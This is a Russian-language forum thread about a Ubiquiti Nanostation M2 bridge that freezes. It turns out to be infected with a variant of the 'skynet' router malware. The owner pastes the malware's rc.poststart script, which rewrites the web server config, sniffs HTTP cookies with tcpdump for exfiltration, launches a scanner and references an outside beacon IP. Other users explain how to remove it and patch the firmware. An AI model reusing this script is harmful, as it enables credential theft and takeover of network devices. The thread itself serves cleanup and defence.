Jump to content
Калькуляторы

Зависает Nanostation M2

Reply to this topic

avgaz   

avgaz
Posted

Сообствено примерно через год использования моста на Nanostation M2 одна из точек начала глючить, примерно раз может и два раза в сутки зависает, то есть пропадает связь между точками и на зависшею точку не зайти, помогает только откл и вкл питания, после опять работает нормально связь между нормальная -67 dBm.

Может кто сталкивался с этим?

Share this post

Link to post
Share on other sites

avgaz   

avgaz
Posted

Для начала полный сброс и прошивку по-новее... это хотя бы попробывать

Сброс делал, прошику не перешивал да и не думаю что она тут в чем то виновата. поменял местами точки думал если проблема в антенне то которая не виснет удобнее перезагружать у себя, по после того какпоменял местами опять стала виснуть уже другая на прежней точке, поменяли пачкорд не помогло, уже даже не знаю в чем дело, может роутер который стоит за точкой виноват?

Share this post

Link to post
Share on other sites

avgaz   

avgaz
Posted

но включи вотчдог, чтобы она сама перезагружалась если пинги пропадут...

Если можно подробней про что это, а то становится не удобно звонить в час ночи на точку что бы перезагрузили.

Скорее всего проблема в недостаточном питании устройства.

Пробовали менял БП не помогло

кабель какой?

Блала обчная не дорогая витая пара, которая простояла около года, то же с начало на это подумал поменяли результата ноль

NS установлена на болконе и подклюючена к роутеру который за окном кабеля не много осадки на него не попадают.

Share this post

Link to post
Share on other sites

avgaz   

avgaz
Posted (edited)

Если я правильно понял то содержимое такое

XM.v5.3.3# cd /etc/persistent
XM.v5.3.3# ls
dropbear_dss_host_key  mcuser
dropbear_rsa_host_key  rc.poststart

Вопрос а по ssh можно где посотреть может лог какой почему зависает антенна?

Edited by avgaz

Share this post

Link to post
Share on other sites

NewUse   

NewUse
Posted
Если я правильно понял то содержимое такое

Да, файл rc.poststart, если Вы его не создавали, то это вирус.

cd /etc/persistent
cat rc.poststart
rm rc.poststart
save
reboot

Вопрос а по ssh можно где посотреть может лог какой почему зависает антенна?

/var/log обыно, ну и через веб-морду, но правильнее настроить syslog на отправку на внешний сервер.

Share this post

Link to post
Share on other sites

Adim   

Adim
Posted

вопрос в тему ...как настроить что бы лог писался к примеру на компьютер с ip адресом 192.168.1.2 в определённую папку? например C:\Log

Share this post

Link to post
Share on other sites

SSD   

SSD
Posted

вопрос в тему ...как настроить что бы лог писался к примеру на компьютер с ip адресом 192.168.1.2 в определённую папку? например C:\Log

Поднимаете на компе с адресом 192.168.1.2 syslog, в настройках которого указываете сохранять в C:\Log.

Share this post

Link to post
Share on other sites

avgaz   

avgaz
Posted

Да, файл rc.poststart, если Вы его не создавали, то это вирус.

Спасибо большое действительно на обоих точках был этот файл с таким содержанием

#!/bin/sh
sed -i 's/\/usr\/www/\/etc\/persistent\/.skynet/g' /etc/lighttpd.conf
kill -9 `ps | grep "lighttpd -D" | cut -d" " -f 3`
ip=`ifconfig ath0 | grep inet | sed "s/.*inet addr:\([^ ]*\).*/\1/g"`

#sleep 60 && trigger_url http://178.216.144.75/probe.cgi/.gif?ip=$ip &

if [ -e /bin/tcpdump ]; then
tcpdump -A -s 0 -w - -l "tcp dst port 80" | grep "^Cookie: " | grep "xs=" >/etc/
/etc/persistent/.skynet/sendcook &
fi
(sleep 20 ; /etc/persistent/.skynet/scan) &
(sleep 100400 ; sleep 42 ; halt) &

 

Удалил посмотри на результат. Но хотелось бы понять как он туда попал, вернее где искать источник заразы? что бы повторно он там не появился?

Share this post

Link to post
Share on other sites

NewUse   

NewUse
Posted
что бы повторно он там не появился?

Это одна из разновидностей вируса skynet, необходимо обновить пошивку, до версии 5.3.5 или выше, в них пофиксена уязвимость.

Но хотелось бы понять как он туда попал

Из интернета или от пользователей сети

что бы повторно он там не появился?

А вот чтоб он или любо другой вирус там не появился -- надо сеть нормально проектировать, озаботившись минимально защитой, например, выделив всю административную сеть в отдельный "менеджмент-вилан", отделив от сети доступа.

А для удалённого управления использовать тоннель, тот же ссш/пптп.

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Followers 0
Go to topic listing Ubiquiti Networks